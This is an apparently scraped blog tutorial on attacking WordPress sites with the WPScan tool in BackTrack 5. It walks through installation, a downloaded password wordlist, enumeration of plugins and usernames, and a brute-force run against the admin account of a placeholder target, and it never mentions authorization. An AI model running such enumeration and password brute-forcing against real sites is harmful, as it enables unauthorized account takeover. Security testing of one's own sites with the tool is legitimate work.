Tutorial on hacking wordpress with WPScan
Tutorial on hacking wordpress with WPScan
This tutorial will
show you how to scan a wordpress installation using WPScan. It will show you
how to download and install WPScan, download a wordlist, use WPScan to
enumerate usernames and plugins, and bruteforce a username.
WPScan is included in
backtrack 5 R1, if you are running R1 you can skip this part.
Installing WPScan in
BT5.
Install dependences by
issuing the following commands:
apt-get install libcurl4-gnutls-dev
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus
gem install --user-install mime-types
gem install --user-install xml-simple
gem install --user-install typhoeus
Install WPScan by
issuing the following commands:
cd /pentest/web
wget http://wpscan.googlecode.com/files/wpscan-1.0.zip
unzip wpscan-1.0.zip
rm -rf wpscan-1.0.zip
cd wpscan-1.0
wget http://www.exploitthis.com/wp-content/uploads/files/wordlist.lst
wget http://wpscan.googlecode.com/files/wpscan-1.0.zip
unzip wpscan-1.0.zip
rm -rf wpscan-1.0.zip
cd wpscan-1.0
wget http://www.exploitthis.com/wp-content/uploads/files/wordlist.lst
Using WPScan
Update your WPScan
plugin list/
ruby ./wpscan.rb --generate_plugin_list 250
Get wordpress version
and theme information.
ruby ./wpscan.rb --url targetsite.com
Scan for wordpress plugins to
exploit.
ruby ./wpscan.rb --url targetsite.com --enumerate p
Find out wordpress usernames
ruby ./wpscan.rb --url targetsite.com --enumerate u
Bruteforce hack wordpress admin
account.
ruby ./wpscan.rb --url targetsite.com --wordlist wordlist.lst
--username admin
As you can see, WPScan is very simple. We were able to get the
wordpress theme, plugins, and username. The target site did not have any
vulnerable plugins installed. If it did, WPScan would have told us what
exploits we could use for the vulnerable plugin.
You can find more information on WPScan at
http://code.google.com/p/wpscan/
0 comments: